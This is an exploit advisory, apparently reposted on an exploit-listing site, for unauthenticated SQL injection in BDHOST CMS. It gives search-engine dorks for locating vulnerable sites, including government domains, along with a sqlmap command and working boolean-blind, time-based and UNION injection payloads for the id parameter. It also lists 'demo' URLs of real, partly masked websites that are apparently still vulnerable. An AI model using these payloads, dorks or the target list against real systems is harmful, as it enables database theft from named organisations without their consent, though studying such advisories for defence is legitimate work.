BDHOST CMS - SQL Injection Vulnerability

2015.06.22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

========================================================= [+] Title :- BDHOST CMS - SQL Injection Vulnerability [+] Date :- 22 - June - 2015 [+] Vendor Homepage :- http://www.bdhost.us/ [+] Version :- All Versions [+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows [+] Category :- webapps [+] Google Dorks :- "Developed by BDHOST" "Developed by BDHOST" inurl:"php?id=" "Developed by BDHOST" +inurl:/.php?id= "Developed by BDHOST" inurl:"php?id=" site:gov.bd [+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN) [+] Team name :- Team Alastor Breeze, Intelligent-Exploit [+] Official Website :- intelligentexploit.com [+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R, m777k [+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha, DK [+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com ========================================================= [+] Severity Level :- High [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error [+] SQL vulnerable File :- home/DOMAIN/public_html/index.php [+] POC :- http://127.0.0.1/index.php?id=[SQL]' The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction. SQLMap ++++++++++++++++++++++++++ python sqlmap.py --url "http://127.0.0.1/index.php?id=[SQL]" --dbs ++++++++++++++++++++++++++ --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=34' AND 8582=8582 AND 'KFrG'='KFrG Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=34' OR SLEEP(5) AND 'qCXr'='qCXr Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-5657' UNION ALL SELECT NULL,CONCAT(0x7171787171,0x4141464957556e754955,0x7176707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- --- [+] DEMO :- http://www.Xp.gov.bd/index.php?id=11%27 http://www.ansarvdpbank.gov.bd/index.php?id=65%27 http://flX.gov.bd/index.php?id=54%27 http://rXmc.gov.bd/index.php?id=184%27 http://www.mahXatours.com/index.php?id=46%27 http://www.fairXnd.com/index.php?id=102%27 http://intragroupXd.com/index.php?id=58%27 http://www.apartXntpropertiesbd.com/news.php?id=6%27 http://www.theXengineersltd.com/index.php?id=42%27 http://www.cdXd.com/index3.php?id=136%27 http://192.99X.95/~distribu/index.php?id=90%27 =======================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top